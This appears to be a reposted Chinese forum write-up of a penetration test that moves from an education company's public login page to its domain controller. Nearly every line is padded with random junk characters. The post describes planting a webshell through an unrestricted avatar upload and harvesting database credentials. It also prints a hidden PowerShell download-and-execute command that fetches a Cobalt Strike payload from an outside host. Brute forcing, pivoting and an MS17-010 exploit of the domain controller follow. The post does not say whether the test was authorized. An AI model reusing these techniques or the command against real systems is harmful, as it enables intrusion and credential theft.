|
6 g: @0 B) }& v" ?8 B5 @3 ~( X$ [ 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
4 u0 D/ p2 Y1 a/ x% P
( I6 j3 p9 h( V) _3 n% A8 s* e5 X! V* t0 X
7 h% ?7 W9 o. t1 ]7 Q# W A
5 X+ n1 C0 `2 m$ x/ w% J' e+ q: l5 S4 X& ^' p
正文2 n& N& |$ j8 L
, D. m: L \9 A4 t6 M2 U
3 `9 a+ ?# O$ F. ^+ V' V% Q
9 x$ Y; x9 o4 ^; A: x, z1 R: i : `& R2 l+ X: e" o) {
9 X* m0 m, T1 n" ^7 X! R+ x
目标:www.xxxx.com(一家教育机构)
; t7 s4 c8 i3 J打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能( F0 H1 y2 \. ?* t" C6 t
8 L1 F; T; Y" M' M ^! U2 G, T J( ?0 A, a% x2 @+ ?
 ) T1 M; ?" S6 `% f" r' d( u
2 d/ X7 u, s6 y& d
' X8 K7 ]% r8 f: P- _9 p
进行了简单的信息搜集
+ q. i' @2 D8 W5 B2 i
* x/ g' l' R" i% D n
3 g) h1 n8 B* L+ }# l
! R) ], G- }* F( O5 |# z9 @) l
% [9 G$ c7 Q/ Z 子域名搜集
3 n+ }. p3 t8 b: t) o5 Y) ~9 q % ~% P, \, C0 d8 d% O
7 V# h M. L7 I7 |* L$ k$ m 
2 {% h7 ]( _& k ) b! y* a, c+ Z
; q- l1 @" E, R3 k
fofa找资产
7 T$ y: T; O# d: E( R; a
: e6 J ]; [' F$ I/ w, n5 i
, @/ h2 f- A- @
k3 T1 T& Z5 R
! ^" K5 Z; }; u& D1 f/ O
6 C/ O5 f8 b* @( E 3 B5 ^& c4 _; U6 F3 p1 M; b
3 m3 j' O( K M3 O) ]
一共七个资产。去重之后只有两个。
1 v1 u5 {* w+ |# r, u$ t$ ~
8 c/ R0 z0 H2 X4 k' d7 n. D
0 x0 b4 t2 p" L* a) F- H ! g& d; A& T2 U; J& ^) v& l
& i! t. r; f/ F
目录探测9 |& N, Y2 Q7 V% g$ u& M2 B
1 t( r1 p# H& e6 b6 D" Q" N
6 t' B; } z9 }3 r  + b& Z+ R2 o' ~3 l# g: u& W
; ?" H8 N! ]6 q: f7 b
9 A0 m" A8 O0 k 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
7 K+ ]! t& t# d+ s& n2 U
& `( c; ?' O- I7 m9 U- n/ c/ h4 @; }% t: Z4 \
l& }9 h9 e) U" @' s
4 R4 T* i- D9 t+ N- S0 }
我又尝试了通过修改返回包来绕过登录界面
+ w! V+ e4 ]! }3 h/ r9 z8 N
) d& F) f+ W* C& {
4 R6 I3 E7 W4 C* B3 U 
( m8 M" H8 D. l
) c8 ?9 e5 [8 Y6 A8 @$ u, e; J! R2 ?1 B# V. n7 i% a* X& B# g$ c! Y
还是不行,尝试注入无果8 {7 w6 J, Z$ c" s5 `
# E# R% ]9 R+ _) l
8 `9 v- y; _) e& t% u* p2 H
 5 e! r* W% |2 R* @: _9 V6 {' I9 Z
5 A2 c, q9 R: {5 Z) G! i: Q* V& k1 s. B# I
不过我目录探测出了一处Spring信息泄露
1 _1 b( W9 `- O. B5 S$ L( W
( S5 G: a& ~; S8 y; t$ O) M k
# U2 h# p1 }, H0 g5 w5 Z3 H& F ) c/ ]4 y4 B; q; y6 Q
g' ^- P. q" B. A+ ^6 E
- P7 k- W# s G6 C3 `$ f X4 J+ Y
: h# o1 Y3 T `& Q4 C; A$ _( P, G @" J9 t% \
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录3 t- j1 b* C4 P
! ?, w; l8 h$ [. Z
! [0 S# O: K$ H$ ]; i  8 ~& w+ a+ E! Q' R
8 t5 R" w' B, W6 e3 }
/ O9 M+ M, c: U' W( ]
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。& J) N% w, `1 O4 C% m/ ^1 {2 ^
% z f! F z, w1 `& P
1 x3 }' ^* U1 S% z% F* d$ d4 ~ 
; U4 g7 ^5 C" @& h
! u$ u* ~; P# O; n- R$ L8 t1 |: l% V! o1 `: c
获取有些师傅到这一步就手机抓包电脑测了。
/ ~7 x4 ]: C& i+ \) h ; d6 [0 h- d7 V& ^
4 n! Q h/ ^! F( N" A Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
# l2 \) s: B; B3 J. c# [0 S7 p
# X" V- N5 k% r. q& L, ~! f: J; G7 O, K" j
其中在一个公众号发现了小程序,可以进行注册。
& k+ G& x) X) S- X M9 `+ L L( Y0 b- P+ y
" ]1 [- U& G) R 看到了头像上传,尝试上传获取WebShell
* c* |$ R3 y( J8 t" l / N8 e7 a. K$ r0 |, y: F) @5 P$ L
6 {* d v# Q: B# v  , q5 ^2 z/ q. V$ r& i; u
( M, d" l3 g* s' D3 W$ Z
6 e1 V F2 D7 w+ ~! O8 ^0 Z9 `
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问2 e8 {. g- i: ]( y1 \. m# |5 v
7 y* U5 A- S. x, d6 u0 T9 B J) O" a* }2 ^+ U1 {; }/ a
 2 u2 K% ?: t5 q k3 @
3 b' V' u( G; }$ z, u- r E/ x5 H3 ^6 R! _4 `, ]0 T6 a$ |, v; w' @
然后上了大马
, E; Y: {, w5 x* f! R2 C6 V8 Q2 N
8 J5 N) z$ R6 |! G7 n! k3 q7 C1 @/ b# z7 `) r1 v4 d, a4 f' }
 1 A% {. c; K0 }" Z ` |% f' Y
* P8 H) H2 G8 V1 L5 d$ y9 n0 \: y
0 _ U0 x( [6 F$ { 
" q, W2 Y: A% g- M3 g$ j/ Z, i & }: N; u+ n+ I: V1 \0 o3 A
) h3 v% b" n0 h' W# c+ D 通过翻找文件发现数据库账号密码* ]6 s+ m$ L; s* e }
# N, M; L% h. L/ d* _" [4 M
8 ^- B! M, C4 D% U. U  * Y1 l! ^% r3 m. x4 D# }3 E$ ~) ?; f
1 U% n7 B0 \( Q0 U$ L; G
# V. P$ H7 S* I2 J# U' j) b, u3 D, H --内网渗透
* g y: j/ v4 ]9 c* s! J
1 O+ `" ?8 r0 e9 p2 u0 b8 G" F5 _2 G# H P: y
直接通过powershell执行 cs上线
; R7 C" K# }3 ^5 e$ e, S" O$ z* F . n" f6 ?, j' a0 l
( e' \1 b4 G+ G3 G1 ~2 f
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"' A, }+ x; o5 d6 z
. Q8 |2 N* a3 }6 p- p& I1 A
3 ^, n v! z* H& E2 q' Z  " S0 {# n8 V1 n3 O
) j f8 k& o1 t2 @$ M0 H0 ]% i
! V2 X& v7 Z" J8 C( \
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破7 L3 T4 T, n: l3 ?- @- T3 ^5 S0 Q
+ E- ]6 e/ G- Y' O% W! a
9 h% N! o; Q/ v3 _5 f5 `  * e4 e' z, l" e+ N4 z7 W% v3 |
5 I8 k+ |0 n1 I7 T
8 E, n" u2 f2 u5 Z* `& Y0 P 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
0 V! U0 n6 e" F
. \6 @9 t% T/ @6 e4 J( s
) n+ \- [% g9 n, o
4 b# @7 H$ O0 Y
/ {5 W0 E- O; \6 F
! ^. @6 L& k3 I& x
 / n+ w4 A: T G0 a$ ^
5 T. V x9 f; U' ?
s) N6 V1 n, D- [7 Q. d 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
# C6 b( n! q; d! j: E* e7 V
) b" j$ ~* ]9 Z8 S
: Y9 j: V. O; S6 l% W ' W+ S9 o# E+ b+ X' a
8 _$ {& y% b; r6 Y/ s$ s# u8 v$ Q
; w5 \) W5 V ?8 ]' ?* n, [
6 F8 W# k9 i0 L5 @) z0 f( D) l
4 d* s1 p* ]# Q3 s; i! @- i
9 |( ^& l* ] e$ |6 Y) k; @
1 L, W( h( Z2 a% p$ L: G! |1 k6 w G4 c. ]; C) V/ }6 c
* }8 Q3 W: i" n1 s( w1 i) l( y
" {2 Z9 T5 |+ w }8 g8 G% k
. f7 w4 \4 K- I% ~/ G: k$ v/ I
\; |' g. S @+ _+ V( d: h% p' _& X6 l+ m: ~8 i8 d/ ]
小结1 ~3 p) C* G; f8 o$ W
' ]. a3 t) Z. U# o6 w( q
3 t$ T& ? b8 [: d& E: }, M/ u 3 ~6 v( r6 Q; V
; A, T1 v! B% V" `( c; E
. A$ q+ ?8 S! y2 L, h1 n' W+ y
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
' t$ f4 h& O9 o8 K
) j6 |5 }' K- y. Q5 g" I7 `0 I! E7 `1 i8 t1 b6 |
' t, B% m' y7 I6 F
+ |$ ]5 n/ h0 S
2 n" z7 x& D& W8 \0 ~ - , Z+ A1 R% k% s/ I2 t8 i
+ h$ M1 T. v3 x
, W* r- {; n+ C& y, J7 b5 `
-
5 R: H( K7 U' D; _! k6 C$ `
2 }+ [2 L9 N8 o3 I! \3 M0 r
9 G" o& t- v2 m; c; R8 O2 e! s
8 Z9 J3 A! N& m: J! O% J5 x2 C# T3 K$ A n! e# e* x
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
6 j% Z5 ~3 f; w8 i6 d
5 O! k! n' x; \2 F9 Y* s
9 D7 r# k3 D" O5 N& k5 J- h5 x" ] % x. F; ~. K2 ^+ r
| 
发表于 2024-3-1 19:41:32
收藏
支持
反对